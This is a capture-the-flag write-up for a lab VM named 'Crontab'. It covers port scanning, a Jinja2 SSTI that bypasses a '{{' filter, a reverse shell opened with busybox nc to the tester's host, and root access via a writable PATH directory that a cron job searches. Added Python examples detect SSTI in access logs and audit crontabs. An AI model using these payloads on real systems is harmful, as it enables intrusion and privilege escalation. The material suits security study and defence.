Crontab

Target notes

  • QQ group: 660930334

I. Information gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-09 10:08 CST
Nmap scan report for 192.168.2.1
Host is up (0.00077s latency).
MAC Address: 0A:00:27:00:00:09 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00056s latency).
MAC Address: 08:00:27:EF:C5:4A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.7
Host is up (0.0015s latency).
MAC Address: 08:00:27:05:3E:D8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.07 seconds

Target IP: 192.168.2.7

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nmap --min-rate 10000 -p- 192.168.2.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-09 10:09 CST
Nmap scan report for 192.168.2.7
Host is up (0.00035s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open upnp
MAC Address: 08:00:27:05:3E:D8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds

Open ports: 22, 80, 5000

2) Service and version scan

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,5000 192.168.2.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-09 10:09 CST
Nmap scan report for 192.168.2.7
Host is up (0.00090s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.1.3 Python/3.9.2
| Date: Tue, 09 Sep 2025 02:09:38 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 532
| Connection: close
| <!DOCTYPE html>
| <html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| </head>
| <body>
| <p1>
| Marisa
| DAZE</p1>
| <br>
| <br>
| <p1>
| Marisa
| (bushi</p1>
| <br>
| <br>
| <p1>Marisa
| </p1>
| <br>
| <br>
| <p1>
| </p1>
| <br>
| <img src="/static/1.png">
| </body>
| </html>
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
1 service unrecognized despite returning data. If you know the service/version,
...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.95 seconds

  1. Port 22: SSH, OpenSSH 8.4p1, used for remote login
  2. Port 80: HTTP
  3. Port 5000: Server header Werkzeug/3.1.3 Python/3.9.2, so probably a Python web framework

3) UDP port scan

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nmap -sU --top-ports 100 192.168.2.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-09 10:12 CST
Nmap scan report for 192.168.2.7
Host is up (0.0012s latency).
All 100 scanned ports on 192.168.2.7 are in ignored states.
Not shown: 55 closed udp ports (port-unreach), 45 open|filtered udp ports (no-response)
MAC Address: 08:00:27:05:3E:D8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 50.64 seconds

No open UDP ports found.

4) Vulnerability script scan

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nmap --script=vuln -p22,80,5000 192.168.2.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-09 10:16 CST
Nmap scan report for 192.168.2.7
Host is up (0.00090s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
5000/tcp open upnp
MAC Address: 08:00:27:05:3E:D8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds

Nothing new here.

II. Web penetration testing

1. Port 80 (HTTP)

Visiting port 80 shows a static page with nothing to exploit; a directory scan turned up nothing useful either.

2. Port 5000

Visiting port 5000 reveals a username, marisa, and the page's hints suggest an SSTI injection.

Directory scanning

Run a directory scan:

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# dirsearch -u "http://192.168.2.7:5000"
...
Target: http://192.168.2.7:5000/
[10:39:33] Starting:
[10:40:05] 400 - 167B - /console
[10:40:17] 200 - 179B - /home
[10:40:22] 200 - 194B - /library

Directories found: /home, /library

  1. Visit /home

    This confirms our earlier guess: there is SSTI injection and the parameter is touhou; now we need to find the injectable page.

  2. Visit /library

    Combining this with the information above, this page is likely where the SSTI injection is.

  3. Verify the SSTI injection

    The input is reflected back, which confirms the SSTI injection.

III. Exploiting the SSTI injection

Test whether the input is parsed as a template.

A WAF blocks the request: it filters {{.

Bypass it directly with jinfeng.

It reports that the bypass succeeded and that shell commands can be executed.

Running id returns its output successfully.

Option 2
Use {% %} instead
{% set x=10-1 %}{% print(x) %}
Payload:
{% set x=().__class__.__bases__[0].__subclasses__() [104].__init__.__globals__['sys'].modules['os'].popen('b usybox nc 192.168.2.4 4444 -e /bin/bash') %}
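
Filtering only {{ leaves the {% %} statement syntax used above untouched, so a delimiter blocklist is at best a detection heuristic; the real fix is to hand user input to the template as a context variable instead of rendering it as template source. The following added example (not part of the writeup or of the VM's application) scans constructed Werkzeug-style access-log lines for query parameters carrying any Jinja2 delimiter and reports which ones a {{-only filter would have let through.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Any Jinja2 block start: {{ expr }}, {% statement %}, {# comment #}, with or without the
# whitespace-control dash ({{-, {%-).  A check for "{{" alone misses the other two forms.
JINJA_START = re.compile(r"\{[{%#]")
# Werkzeug dev-server / Common Log Format request line.
REQUEST_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def naive_filter_blocks(value):
    """The check the writeup's WAF appears to implement: only the '{{' delimiter is rejected."""
    return "{{" in value

def has_jinja_syntax(value):
    """Complete delimiter check; decoding once more also catches double-URL-encoded values."""
    return JINJA_START.search(unquote(value)) is not None

def flag_ssti_requests(log_lines):
    """Return [(ip, path, param, value, bypasses_naive_filter)] for query values carrying Jinja2 syntax."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            for value in values:                          # parse_qs already percent-decodes once
                if has_jinja_syntax(value):
                    hits.append((m["ip"], url.path, param, value, not naive_filter_blocks(value)))
    return hits

# Constructed sample log lines (not captured from the VM); the third carries the {% %} payload from the writeup.
SAMPLE_LOG = [
    '192.168.2.4 - - [09/Sep/2025 10:45:01] "GET /library?touhou=marisa HTTP/1.1" 200 -',
    '192.168.2.4 - - [09/Sep/2025 10:45:09] "GET /library?touhou=%7B%7B7*7%7D%7D HTTP/1.1" 403 -',
    '192.168.2.4 - - [09/Sep/2025 10:45:20] "GET /library?touhou=%7B%25+set+x%3D10-1+%25%7D%7B%25+print%28x%29+%25%7D HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for ip, path, param, value, bypassed in flag_ssti_requests(SAMPLE_LOG):
        print(f"{ip} {path} {param}={value!r} evades '{{{{'-only filter: {bypassed}")
```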

IV. Getting a shell

Just catch the reverse shell.

Shell obtained:

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.7] 54272
id
uid=1000(marisa) gid=1000(marisa) groups=1000(marisa)

Upgrading to a stable shell

script /dev/null -c bash
# press Ctrl+Z to suspend it
stty raw -echo; fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

V. Privilege escalation

1. Scheduled tasks (cron)

Given the name of the VM, check the cron jobs first.

marisa@Crontab:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root master_spark

master_spark runs as root every minute, and it is referenced without an absolute path.

When a command is run without an absolute path on Linux, the shell searches the directories listed in PATH in order (here the PATH set at the top of the crontab, which begins with /usr/local/sbin).

2. Writing into a PATH directory

Check the PATH directories:

marisa@Crontab:~$ ls -la /usr/local/sbin
total 8
drwxrwxrwx 2 root root 4096 Sep 8 03:39 .
drwxr-xr-x 10 root root 4096 Mar 18 20:26 ..

The directory is world-writable (drwxrwxrwx).

So we can create master_spark in that directory and put the privilege-escalation command in it.
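
The two observations above, a cron job referenced by bare name and a PATH directory that non-root users can write to, are exactly what an audit should combine. The following added example (not from the writeup) parses a system crontab in the format shown above, finds every command word that cron's shell will resolve through the crontab's own PATH, and lists the PATH directories a non-root user could write to that are searched before the real binary is found. The embedded sample crontab is constructed from the entries shown above; the unsafe-directory check can be swapped out (the unsafe parameter) so the logic can be exercised without touching the real filesystem.

```python
import os
import re
import stat

SAMPLE_CRONTAB = (  # constructed sample modelled on the /etc/crontab above, not the VM's file
    "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
    "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
    "* * * * * root master_spark\n")
BUILTINS = {"cd", "test", "[", "export", "exit", "umask", "set", "echo"}  # never resolved via PATH

def parse_system_crontab(text):
    """Split a system crontab (/etc/crontab, /etc/cron.d/*) into (env, [(schedule, user, command)])."""
    env, jobs = {}, []
    for line in (l.strip() for l in text.splitlines() if l.strip() and not l.lstrip().startswith("#")):
        if re.match(r"[A-Za-z_]\w*\s*=", line):           # SHELL=, PATH=, MAILTO= ...
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip('"')
            continue
        nsched = 1 if line.startswith("@") else 5         # @reboot-style vs five time fields
        parts = line.split(None, nsched + 1)
        if len(parts) == nsched + 2:                      # malformed entries are skipped
            jobs.append((" ".join(parts[:nsched]), parts[nsched], parts[nsched + 1]))
    return env, jobs

def unsafe_dir(d):
    """True if a non-root user can create files in d: not root-owned, world-writable, or group-writable by a non-root group."""
    if not os.path.isdir(d):
        return False                                      # missing PATH entries are skipped
    st = os.stat(d)
    return st.st_uid != 0 or bool(st.st_mode & stat.S_IWOTH) or (bool(st.st_mode & stat.S_IWGRP) and st.st_gid != 0)

def audit_crontab(text, unsafe=unsafe_dir):
    """Return [(schedule, user, word, unsafe_dirs)] for PATH-resolved command words (compound lines split on && || ; |)."""
    env, jobs = parse_system_crontab(text)
    path_dirs = env.get("PATH", "/usr/bin:/bin").split(":")
    findings = []
    for sched, user, cmd in jobs:
        for segment in re.split(r"\|\||&&|[;|]", cmd.replace("(", " ").replace(")", " ")):
            words = segment.split()
            if not words or "/" in words[0] or words[0] in BUILTINS:
                continue
            shadowers = []
            for d in path_dirs:
                if unsafe(d):
                    shadowers.append(d)
                if os.path.isfile(os.path.join(d, words[0])):
                    break                                 # real binary lives here; the search stops
            if shadowers:
                findings.append((sched, user, words[0], shadowers))
    return findings
```

On the VM described here, audit_crontab(SAMPLE_CRONTAB) would report both master_spark and run-parts as shadowable from /usr/local/sbin, since that directory is searched first and is world-writable.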

marisa@Crontab:~$ cd /usr/local/sbin
marisa@Crontab:/usr/local/sbin$ echo 'chmod +s /bin/bash' >> master_spark
marisa@Crontab:/usr/local/sbin$ chmod +x master_spark

3. Getting root

After waiting a minute, check /bin/bash: it now has the SUID bit set.

marisa@Crontab:~$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash

Now escalate directly:

marisa@Crontab:~$ /bin/bash -p
bash-5.0# id;whoami
uid=1000(marisa) gid=1000(marisa) euid=0(root) egid=0(root) groups=0(root),1000(marisa)
root

VI. Getting the flags

bash-5.0# cat /home/marisa/user.txt /root/root.txt 
flag{marisa marisa-master spark}
flag{touhou sai gao}

Crontab
http://miao-sec.github.io/Maze-sec/Crontab/
Author: Miao
Published: 9 January 2026
License: BY-MIAO